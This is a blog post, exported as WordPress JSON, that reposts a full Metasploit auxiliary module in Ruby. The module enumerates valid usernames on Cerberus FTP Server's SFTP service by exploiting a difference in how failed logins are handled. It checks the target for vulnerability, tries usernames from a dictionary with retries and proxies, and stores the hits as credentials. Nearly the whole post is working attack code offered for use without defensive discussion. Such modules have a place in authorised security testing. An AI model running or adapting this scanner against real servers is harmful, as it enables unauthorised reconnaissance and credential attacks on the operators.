{"id":59361,"date":"2024-09-01T21:29:38","date_gmt":"2024-09-01T18:29:38","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/181228\/cerberus_sftp_enumusers.rb.txt"},"modified":"2024-09-01T21:29:38","modified_gmt":"2024-09-01T18:29:38","slug":"cerberus-ftp-server-sftp-username-enumeration","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/cerberus-ftp-server-sftp-username-enumeration\/","title":{"rendered":"Cerberus FTP Server SFTP Username Enumeration"},"content":{"rendered":"

##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n

require ‘net\/ssh’<\/p>\n

class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report<\/p>\n

def initialize(info = {})
super(update_info(info,
‘Name’ => ‘Cerberus FTP Server SFTP Username Enumeration’,
‘Description’ => %q{
This module uses a dictionary to brute force valid usernames from
Cerberus FTP server via SFTP. This issue affects all versions of
the software older than 6.0.9.0 or 7.0.0.2 and is caused by a discrepancy
in the way the SSH service handles failed logins for valid and invalid
users. This issue was discovered by Steve Embling.
},
‘Author’ => [
‘Steve Embling’, # Discovery
‘Matt Byrne <attackdebris[at]gmail.com>’ # Metasploit module
],
‘References’ =>
[
[ ‘URL’, ‘http:\/\/xforce.iss.net\/xforce\/xfdb\/93546’ ],
[ ‘BID’, ‘67707’]],
‘License’ => MSF_LICENSE,
‘DisclosureDate’ => ‘2014-05-27’
))<\/p>\n

register_options(
[
Opt::Proxies,
Opt::RPORT(22),
OptPath.new(
‘USER_FILE’,
[true, ‘Files containing usernames, one per line’, nil])
], self.class
)<\/p>\n

register_advanced_options(
[
OptInt.new(
‘RETRY_NUM’,
[true , ‘The number of attempts to connect to a SSH server for each user’, 3]),
OptInt.new(
‘SSH_TIMEOUT’,
[true, ‘Specify the maximum time to negotiate a SSH session’, 10]),
OptBool.new(
‘SSH_DEBUG’,
[true, ‘Enable SSH debugging output (Extreme verbosity!)’, false])
])
end<\/p>\n

def rport
datastore[‘RPORT’]end<\/p>\n

def retry_num
datastore[‘RETRY_NUM’]end<\/p>\n

def check_vulnerable(ip)
opt_hash = {
:port => rport,
:auth_methods => [‘password’, ‘keyboard-interactive’],
:use_agent => false,
:config => false,
:password_prompt => Net::SSH::Prompt.new,
:non_interactive => true,
:proxies => datastore[‘Proxies’],
:verify_host_key => :never
}<\/p>\n

begin
transport = Net::SSH::Transport::Session.new(ip, opt_hash)
rescue Rex::ConnectionError
return :connection_error
end<\/p>\n

auth = Net::SSH::Authentication::Session.new(transport, opt_hash)
auth.authenticate(“ssh-connection”, Rex::Text.rand_text_alphanumeric(8), Rex::Text.rand_text_alphanumeric(8))
auth_method = auth.allowed_auth_methods.join(‘|’)
print_good “#{peer(ip)} Server Version: #{auth.transport.server_version.version}”
report_service(
host: ip,
port: rport,
name: “ssh”,
proto: “tcp”,
info: auth.transport.server_version.version
)<\/p>\n

if auth_method.empty?
:vulnerable
else
:safe
end
end<\/p>\n

def check_user(ip, user, port)
pass = Rex::Text.rand_text_alphanumeric(8)<\/p>\n

opt_hash = {
:auth_methods => [‘password’, ‘keyboard-interactive’],
:port => port,
:use_agent => false,
:config => false,
:proxies => datastore[‘Proxies’],
:verify_host_key => :never
}<\/p>\n

opt_hash.merge!(verbose: :debug) if datastore[‘SSH_DEBUG’]transport = Net::SSH::Transport::Session.new(ip, opt_hash)
auth = Net::SSH::Authentication::Session.new(transport, opt_hash)<\/p>\n

begin
::Timeout.timeout(datastore[‘SSH_TIMEOUT’]) do
auth.authenticate(“ssh-connection”, user, pass)
auth_method = auth.allowed_auth_methods.join(‘|’)
if auth_method != ”
:success
else
:fail
end
end
rescue Rex::ConnectionError
return :connection_error
rescue Net::SSH::Disconnect, ::EOFError
return :success
rescue ::Timeout::Error
return :connection_error
end
end<\/p>\n

def do_report(ip, user, port)
service_data = {
address: ip,
port: rport,
service_name: ‘ssh’,
protocol: ‘tcp’,
workspace_id: myworkspace_id
}<\/p>\n

credential_data = {
origin_type: :service,
module_fullname: fullname,
username: user,
}.merge(service_data)<\/p>\n

login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::UNTRIED,
}.merge(service_data)<\/p>\n

create_credential_login(login_data)
end<\/p>\n

def peer(rhost=nil)
“#{rhost}:#{rport} SSH -“
end<\/p>\n

def user_list
users = nil
if File.readable? datastore[‘USER_FILE’]users = File.new(datastore[‘USER_FILE’]).read.split
users.each {|u| u.downcase!}
users.uniq!
else
raise ArgumentError, “Cannot read file #{datastore[‘USER_FILE’]}”
end<\/p>\n

users
end<\/p>\n

def attempt_user(user, ip)
attempt_num = 0
ret = nil<\/p>\n

while (attempt_num <= retry_num) && (ret.nil? || ret == :connection_error)
if attempt_num > 0
Rex.sleep(2 ** attempt_num)
vprint_status(“#{peer(ip)} Retrying ‘#{user}’ due to connection error”)
end<\/p>\n

ret = check_user(ip, user, rport)
attempt_num += 1
end<\/p>\n

ret
end<\/p>\n

def show_result(attempt_result, user, ip)
case attempt_result
when :success
print_good “#{peer(ip)} User ‘#{user}’ found”
do_report(ip, user, rport)
when :connection_error
print_error “#{peer(ip)} User ‘#{user}’ could not connect”
when :fail
vprint_status “#{peer(ip)} User ‘#{user}’ not found”
end
end<\/p>\n

def run_host(ip)
print_status “#{peer(ip)} Checking for vulnerability”
case check_vulnerable(ip)
when :vulnerable
print_good “#{peer(ip)} Vulnerable”
print_status “#{peer(ip)} Starting scan”
user_list.each do |user|
show_result(attempt_user(user, ip), user, ip)
end
when :safe
print_error “#{peer(ip)} Not vulnerable”
when :connection_error
print_error “#{peer(ip)} Connection failed”
end
end
end<\/p>\n","protected":false},"excerpt":{"rendered":"

### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## require ‘net\/ssh’ class MetasploitModule < Msf::Auxiliaryinclude Msf::Auxiliary::Scannerinclude Msf::Auxiliary::Report def initialize(info = {})super(update_info(info,‘Name’ => ‘Cerberus FTP Server SFTP Username Enumeration’,‘Description’ => %q{This module uses a dictionary to brute force valid usernames fromCerberus FTP server via SFTP. This issue affects all versions ofthe software older than 6.0.9.0 or …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59361","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59361","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59361"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59361\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59361"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59361"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59361"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}